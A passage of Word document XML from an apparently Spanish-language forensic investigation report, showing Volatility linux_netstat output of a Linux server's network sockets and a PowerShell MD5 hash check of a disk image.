      </w:r>
    </w:p>
    <w:p w14:paraId="0C11D187"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apache2/19705</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229FE137"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443 ::              :    0 LISTEN                    apache2/19705</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8FC528"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apache2/19706</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288B88F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80 ::              :    0 LISTEN                    apache2/19706</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C133C9D"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apache2/19706</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5908F953"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443 ::              :    0 LISTEN                    apache2/19706</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4851B806"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apache2/19707</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020D93F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80 ::              :    0 LISTEN                    apache2/19707</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF29078"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apache2/19707</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9D43B5"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443 ::              :    0 LISTEN                    apache2/19707</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553B47C0"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apache2/19708</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3C7826"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80 ::              :    0 LISTEN                    apache2/19708</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DA3D1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apache2/19708</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6796A4"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443 ::              :    0 LISTEN                    apache2/19708</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240AFD41"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apache2/19952</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A25AC3"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80 ::              :    0 LISTEN                    apache2/19952</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380D4DC"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lastRenderedPageBreak/>
        <w:t>TCP      0.0.0.0         :    0 0.0.0.0         :    0 CLOSE                     apache2/19952</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3072FCF3"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443 ::              :    0 LISTEN                    apache2/19952</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465EC806"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::ffff172.31.38.110:   80 ::ffff18.195.165.56:41529 CLOSE_WAIT                apache2/19952</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C6E8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172.31.38.110   :46384 172.31.33.128   : 8080 ESTABLISHED               apache2/19952</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C996E3C"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apache2/19953</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5526E649"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80 ::              :    0 LISTEN                    apache2/19953</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505D6D56"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apache2/19953</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B386EE2"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443 ::              :    0 LISTEN                    apache2/19953</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F02AA7F"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apache2/20230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14538E2D"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80 ::              :    0 LISTEN                    apache2/20230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64820520"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apache2/20230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0B7FF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443 ::              :    0 LISTEN                    apache2/20230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3339947B"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apache2/20231</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4301F37F"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80 ::              :    0 LISTEN                    apache2/20231</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE72D8C"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apache2/20231</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCB289B"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443 ::              :    0 LISTEN                    apache2/20231</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE1867F"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apache2/20232</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F174D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80 ::              :    0 LISTEN                    apache2/20232</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1CAA4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apache2/20232</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BE6DBF"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443 ::              :    0 LISTEN                    apache2/20232</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4584F228"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apache2/20233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184AC419"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80 ::              :    0 LISTEN                    apache2/20233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0751A536"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apache2/20233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623BCFF2"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443 ::              :    0 LISTEN                    apache2/20233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA5741F"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172.31.38.110   :   22 83.247.136.74   :16666 ESTABLISHED                  sshd/20483</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056490BF"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674291                sshd/20483 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E11ADCC"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674626                sshd/20483 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07457714"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674389             systemd/20485 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF5F96F"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674389             systemd/20485 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6ECF86"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674408             systemd/20485 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1C03FF"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674432             systemd/20485 /run/user/1000/systemd/notify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D22FF2"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674433             systemd/20485 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A861661"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674434             systemd/20485 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45155B4F"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674435             systemd/20485 /run/user/1000/systemd/private</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5CB7E5"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674439             systemd/20485 /run/user/1000/gnupg/S.dirmngr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0307B000"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674440             systemd/20485 /run/user/1000/gnupg/S.gpg-agent.ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F7A160"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674441             systemd/20485 /run/user/1000/gnupg/S.gpg-agent.extra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF6D49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674442             systemd/20485 /run/user/1000/gnupg/S.gpg-agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E477BB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674443             systemd/20485 /run/user/1000/gnupg/S.gpg-agent.browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27626F9B"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674389            (sd-pam)/20486 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06604968"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674389            (sd-pam)/20486 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ECC1D2"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674395            (sd-pam)/20486 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D4611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172.31.38.110   :   22 83.247.136.74   :16666 ESTABLISHED                  sshd/20576</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759E8ED7"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674291                sshd/20576 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDAD13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674625                sshd/20576 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B99997B"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">UNIX 440180              pickup/20703 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA1BD61"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UNIX 440178              pickup/20703 public/pickup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB06D5"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UNIX 675208              pickup/20703 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C71F5FD" w14:textId="77777777" w:rsidR="00FB41B7" w:rsidRDefault="00FB41B7" w:rsidP="00FB41B7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB41B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>UNIX 676234                sudo/20893</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DF9C22" w14:textId="3AF6D83B" w:rsidR="00FB41B7" w:rsidRPr="001225E9" w:rsidRDefault="00FB41B7" w:rsidP="00FB41B7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495158B3" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="1F3063A4" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="154F18B5" w14:textId="243DAA1D" w:rsidR="00FB41B7" w:rsidRDefault="00FB41B7">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B209903" w14:textId="24D24361" w:rsidR="00FB41B7" w:rsidRPr="00C9562B" w:rsidRDefault="00FB41B7" w:rsidP="00FB41B7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="203" w:name="_Ref155740489"/>
      <w:bookmarkStart w:id="204" w:name="_Toc155782544"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="000D01C0">
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C4245F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Resumen del comando linux_</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB41B7">
        <w:t>netstat</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203"/>
      <w:bookmarkEnd w:id="204"/>
    </w:p>
    <w:p w14:paraId="1CBAA69D" w14:textId="77777777" w:rsidR="00FB41B7" w:rsidRDefault="00FB41B7" w:rsidP="00FB41B7"/>
    <w:p w14:paraId="3F96940D" w14:textId="26BAC564" w:rsidR="00FB41B7" w:rsidRDefault="00FB41B7" w:rsidP="00FB41B7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6342038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Volatility Foundation Volatility Framework 2.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768F593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UDP      172.31.38.110   :   68 0.0.0.0         :    0                   systemd-network/2788 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745F869F"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UDP      127.0.0.53      :   53 0.0.0.0         :    0                   systemd-resolve/2804 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBC7F92"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TCP      127.0.0.53      :   53 0.0.0.0         :    0 LISTEN            systemd-resolve/2804 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D76B69D"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22 0.0.0.0         :    0 LISTEN                       sshd/12159</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E48962D"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22 ::              :    0 LISTEN                       sshd/12159</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B620D4"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TCP      127.0.0.1       : 3306 0.0.0.0         :    0 LISTEN                     mysqld/5127 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63162EB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TCP      0.0.0.0         :    0 0.0.0.0         :    0 CLOSE                     apache2/5469 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650C2509"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TCP      ::              :   80 ::              :    0 LISTEN                    apache2/5469 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF5A755"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TCP      0.0.0.0         :    0 0.0.0.0         :    0 CLOSE                     apache2/5469 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74213248"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 xml:space="preserve">TCP      ::              :  443 ::              :    0 LISTEN                    apache2/5469 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3892DC28"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127.0.0.1       :   25 0.0.0.0         :    0 LISTEN                     master/26489</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7514C8DD"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::1             :   25 ::              :    0 LISTEN                     master/26489</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396ABA6D"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apache2/19704</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7EB00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80 ::              :    0 LISTEN                    apache2/19704</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D34D55C"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apache2/19704</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEA272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443 ::              :    0 LISTEN                    apache2/19704</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EDD3D3"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apache2/19705</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E3FD67"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80 ::              :    0 LISTEN                    apache2/19705</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7D114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apache2/19705</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D188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443 ::              :    0 LISTEN                    apache2/19705</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1073BCCE"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apache2/19706</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431EEDAC"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80 ::              :    0 LISTEN                    apache2/19706</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1490BA3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apache2/19706</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F44F547"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443 ::              :    0 LISTEN                    apache2/19706</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63824CB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apache2/19707</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C674A8"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80 ::              :    0 LISTEN                    apache2/19707</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107618E4"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apache2/19707</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA59DB9"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443 ::              :    0 LISTEN                    apache2/19707</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A09334"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apache2/19708</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3C194B"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80 ::              :    0 LISTEN                    apache2/19708</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A31F33"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apache2/19708</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F0AFE8"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443 ::              :    0 LISTEN                    apache2/19708</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609942F4"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apache2/19952</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AA6527"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80 ::              :    0 LISTEN                    apache2/19952</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF77332"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apache2/19952</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690AF989"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443 ::              :    0 LISTEN                    apache2/19952</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6513FBB2"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::ffff172.31.38.110:   80 ::ffff18.195.165.56:41529 CLOSE_WAIT                apache2/19952</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AABD054"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172.31.38.110   :46384 172.31.33.128   : 8080 ESTABLISHED               apache2/19952</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C63F93D"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apache2/19953</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625D6104"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80 ::              :    0 LISTEN                    apache2/19953</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335FB7B6"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lastRenderedPageBreak/>
        <w:t>TCP      0.0.0.0         :    0 0.0.0.0         :    0 CLOSE                     apache2/19953</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A17921D"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443 ::              :    0 LISTEN                    apache2/19953</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754D49EF"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apache2/20230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311A4924"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80 ::              :    0 LISTEN                    apache2/20230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5874B288"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apache2/20230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF1FE0D"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443 ::              :    0 LISTEN                    apache2/20230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ABE8C0"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apache2/20231</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0CF826"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80 ::              :    0 LISTEN                    apache2/20231</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B98A0F2"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apache2/20231</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39634745"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443 ::              :    0 LISTEN                    apache2/20231</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B1F65D"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apache2/20232</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36450E86"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80 ::              :    0 LISTEN                    apache2/20232</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124B0220"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apache2/20232</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629D3820"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443 ::              :    0 LISTEN                    apache2/20232</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447F0DCC"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apache2/20233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594133B5"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80 ::              :    0 LISTEN                    apache2/20233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35699679"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0.0.0.0         :    0 0.0.0.0         :    0 CLOSE                     apache2/20233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBE7321"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              :  443 ::              :    0 LISTEN                    apache2/20233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B53844A" w14:textId="77777777" w:rsidR="00FB41B7" w:rsidRPr="00FB41B7" w:rsidRDefault="00FB41B7" w:rsidP="00FB41B7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB41B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>TCP      172.31.38.110   :   22 83.247.136.74   :16666 ESTABLISHED                  sshd/20483</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C37E33C" w14:textId="2E06F9C7" w:rsidR="00FB41B7" w:rsidRDefault="00FB41B7" w:rsidP="00FB41B7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB41B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>TCP      172.31.38.110   :   22 83.247.136.74   :16666 ESTABLISHED                  sshd/20576</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C35C2C" w14:textId="154F5246" w:rsidR="00FB41B7" w:rsidRPr="00C9562B" w:rsidRDefault="00FB41B7" w:rsidP="00FB41B7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B79614" w14:textId="0C8DAEC5" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="69BCA796" w14:textId="3C1D2876" w:rsidR="00FB41B7" w:rsidRDefault="00FB41B7">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="380956A2" w14:textId="243FDA17" w:rsidR="00184E50" w:rsidRPr="00C9562B" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="205" w:name="_Ref155754896"/>
      <w:bookmarkStart w:id="206" w:name="_Toc155782545"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="000D01C0">
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>I.</w:t>
      </w:r>
      <w:r w:rsidR="00C4245F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00184E50">
        <w:t>Comando hash MD5 y SHA1 de</w:t>
      </w:r>
      <w:r>
        <w:t>l disco duro.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205"/>
      <w:bookmarkEnd w:id="206"/>
    </w:p>
    <w:p w14:paraId="45A61534" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="388FF20F" w14:textId="77777777" w:rsidR="00184E50" w:rsidRPr="00C9562B" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0545F3A2" w14:textId="527F41D3" w:rsidR="00184E50" w:rsidRPr="00C9562B" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184E50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Get-FileHash .\Server_HDD.E01 -Algorithm MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A03A95" w14:textId="77777777" w:rsidR="00184E50" w:rsidRPr="00C9562B" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E6039E" w14:textId="77777777" w:rsidR="00184E50" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F450D5" w14:textId="4F12D79A" w:rsidR="00184E50" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>La respuesta de la consola es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EA4D3C" w14:textId="77777777" w:rsidR="00184E50" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FCDA1AB" w14:textId="77777777" w:rsidR="00184E50" w:rsidRPr="00C9562B" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D984C77" w14:textId="77777777" w:rsidR="00184E50" w:rsidRPr="00184E50" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184E50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Algorithm       Hash                                                                   Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA660B" w14:textId="77777777" w:rsidR="00184E50" w:rsidRPr="00184E50" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184E50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---------       ----                                                                   ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9D8BF2" w14:textId="77777777" w:rsidR="00184E50" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184E50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>MD5             324ED7DB769620E3FB55C027480D0EF3                                       C:\Users\jrodg85\Desktop\Nuev...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE61B8D" w14:textId="46F8B0A5" w:rsidR="00184E50" w:rsidRPr="00C9562B" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BBAA39" w14:textId="77777777" w:rsidR="00184E50" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="227DF073" w14:textId="77777777" w:rsidR="00184E50" w:rsidRPr="00C9562B" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
